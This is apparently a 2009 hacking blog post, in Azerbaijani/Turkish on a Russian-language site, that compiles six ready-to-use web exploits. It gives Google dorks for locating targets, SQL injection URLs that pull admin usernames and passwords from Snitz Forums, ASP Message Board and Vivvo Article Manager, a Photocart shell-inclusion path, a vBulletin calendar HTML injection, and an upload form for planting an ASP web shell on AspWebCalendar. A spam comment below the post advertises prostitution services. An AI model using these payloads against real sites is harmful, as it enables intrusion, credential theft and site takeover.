Главная » 2009 » Март » 14 » 6 Eded sayt aciqlari
13:05
6 Eded sayt aciqlari

Alıntı
"Photocart" Acygy (Güncel): basit bir resim galerisi hack'leme yöntemi
Aratacagymyz KoD(google.com): "allinurl: photocart"

Ekleyecegimiz KoD: /photocart/adminprint.php?admin_folder=shell

====================================================================

Vbuletin Calander Açy?y (Html Açyk ise): html acyksa vb'de cak
Calander 'de bir açyk var açyk olurmu bilmem ama

http://siteady.com/calendar.php?do=add&type=single&c=1

Burada html kodlary açyk ise istediginizi yazabilirsiniz.

=============================================================


Snitz Forums 2000 v3.1 SR4 (pop_profile.asp) SQL Injection Vulnerability: milw0rm buq


POC: pop_profile.asp?mode=display&id=[SQL-INJ]


Username:
pop_profile.asp?mode=display&id=1

Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS


=======================================================================================

ASP Message Board 2.2.1c Remote SQL Injection Vulnerability: milw0rm buq


* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password :
http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxxor 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))


================================================================================

 


AspWebCalendar 2008 Remote File Upload Vulnerability: milw0rm buq


# Dork :calendar.asp?eventdetail

[url]http://[site.com]/path/calendar_admin.asp?action=uploadfile[/url] ==>>> upload your Asp shell

[url]http://[site.com]/path/calendar/eventimages/yourshell.asp[/url] ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>


===========================================================================

 

Vivvo Article Manager : <= 3.2 (id) Remote SQL Injection Vulnerability


#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2

#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.

#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]

#Admin Panel:http://[target]/[path]/admin

#For google searching:Vivvo Article Manager

Просмотров: 4578 | Добавил: Angel_Boy | Рейтинг: 0.0/0
Всего комментариев: 1
1  
где найти проституток в рязани самары шлюхи снять проститутку ульяновск обьявления интим за деньги винница найти проститутку в городе омске
http://dosug-moskva.100webspace.net/sitemap.xml

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]